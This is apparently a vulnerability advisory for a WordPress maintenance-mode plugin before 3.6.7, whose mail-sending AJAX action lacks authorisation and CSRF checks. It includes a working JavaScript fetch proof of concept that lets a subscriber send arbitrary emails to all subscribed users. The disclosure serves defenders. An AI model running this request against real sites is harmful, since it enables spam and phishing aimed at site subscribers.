WordPress Plugin Vulnerabilities
Coming soon and Maintenance mode < 3.6.7 - Subscriber+ Arbitrary Email Sending to Subscribed Users
Description
The plugin does not have authorisation and CSRF checks in its coming_soon_send_mail AJAX action, allowing any authenticated users, with a role as low as subscriber to send arbitrary emails to all subscribed users
Proof of Concept
fetch("https://example.com/wp-admin/admin-ajax.php", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "body": "action=coming_soon_send_mail&massage_title=title&massage_description=description&massage_from_name=from&massage_from_mail=from@example.com", "method": "POST", "credentials": "include" }).then(response => response.text()) .then(data => console.log(data));
Affects Plugins
References
Classification
Type
NO AUTHORISATION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-01-24 (about 2 years ago)
Added
2022-01-24 (about 2 years ago)
Last Updated
2023-07-24 (about 9 months ago)